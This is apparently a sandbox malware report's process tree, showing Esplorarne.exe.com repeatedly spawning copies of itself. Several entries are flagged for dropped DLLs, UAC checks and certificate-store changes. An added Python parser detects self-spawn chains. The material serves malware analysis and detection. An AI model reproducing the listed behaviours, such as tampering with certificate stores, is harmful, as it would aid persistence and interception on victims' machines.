C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i192⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i193⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i194⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i195⤵
- Checks computer location settings
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i196⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i197⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i198⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i199⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i200⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i201⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i202⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i203⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i204⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i205⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i206⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i207⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i208⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i209⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i210⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i211⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i212⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i213⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i214⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i215⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i216⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i217⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i218⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i219⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i220⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i221⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i222⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i223⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i224⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i225⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i226⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i227⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i228⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i229⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i230⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i231⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i232⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i233⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i234⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i235⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i236⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i237⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i238⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i239⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i240⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i241⤵
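A chain this long is easier to reason about by machine than by eye. The Python below is an added example, not part of the sandbox report or of any vendor's tooling: it parses the report's raw extracted process-tree text (image path and command line run together, a trailing "iN⤵" marker, "- flag" lines and bare "-" items), treats the trailing number as the tree-depth marker and the leading "i" as page residue (both are assumptions about the extraction), and flags a self-spawn chain, meaning the same image appearing one level deeper each time. That chain is the stronger signal here than any individual behaviour flag, which the sandbox attributes to whichever copy happened to perform the action. The sample text is a constructed excerpt in the same format; the behaviour flags are ones this report lists, but the levels they sit on are arbitrary, and the `min_len` threshold is a free choice.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# One process entry in the raw extraction looks like
#   <image path><command line> i<N>⤵
# with the image path and the command line run together (no separator),
# followed by "- <behaviour>" lines and bare "-" lines for empty list items.
# Assumption: the trailing number is the sandbox's tree-depth marker and the
# "i" in front of it is icon residue from the page.
HEADER_RE = re.compile(
    r"^(?P<image>[A-Za-z]:\\.+?)"        # image path, minimal match ...
    r"(?=[A-Za-z]:\\|\s+i\d+⤵)"          # ... ending where a 2nd drive path or the trailer starts
    r"(?P<cmd>.*?)\s+i(?P<level>\d+)⤵$"  # command line (may be empty), then the depth trailer
)


@dataclass
class ProcEntry:
    level: int
    image: str
    cmdline: str
    behaviours: list = field(default_factory=list)


def parse_tree(text: str) -> list:
    """Turn the extracted process-tree text into ProcEntry objects."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HEADER_RE.match(line)
        if m:
            entries.append(ProcEntry(int(m["level"]), m["image"], m["cmd"]))
            continue
        if line.startswith("-") and entries:
            flag = line[1:].strip()
            if flag:  # a bare "-" is an empty list item left by the extraction
                entries[-1].behaviours.append(flag)
    return entries


def self_spawn_chains(entries: list, min_len: int = 5) -> list:
    """Find runs where the same image appears one level deeper each time,
    i.e. the process launching a copy of itself as its own child."""
    chains, run = [], []
    for e in entries:
        if run and e.image.lower() == run[-1].image.lower() and e.level == run[-1].level + 1:
            run.append(e)
        else:
            if len(run) >= min_len:
                chains.append(run)
            run = [e]
    if len(run) >= min_len:
        chains.append(run)
    return chains


def behaviour_index(entries: list) -> dict:
    """Map each flagged behaviour to the levels it was observed at."""
    idx = defaultdict(list)
    for e in entries:
        for b in e.behaviours:
            idx[b].append(e.level)
    return dict(idx)


def summarize(text: str, min_len: int = 5) -> dict:
    """Process count, self-spawn chains as (first level, last level, image), and behaviour index."""
    entries = parse_tree(text)
    return {
        "processes": len(entries),
        "chains": [(c[0].level, c[-1].level, c[0].image) for c in self_spawn_chains(entries, min_len)],
        "behaviours": behaviour_index(entries),
    }


# Constructed excerpt in the report's extracted format. The behaviour flags are
# ones this report lists; which level they sit on here is arbitrary.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵
- Adds Run key to start application
- Modifies system certificate store
-
"""

if __name__ == "__main__":
    for key, value in summarize(SAMPLE).items():
        print(key, value)
```

On the constructed sample the summary reports one chain spanning levels 14 to 18 and places each flag at the level it was attached to. The same parent-image-equals-child-image test applied to live endpoint telemetry (for example Sysmon event ID 1, comparing ParentImage with Image and counting the depth) catches this pattern independently of which behaviour flags a sandbox happens to attach to any one copy.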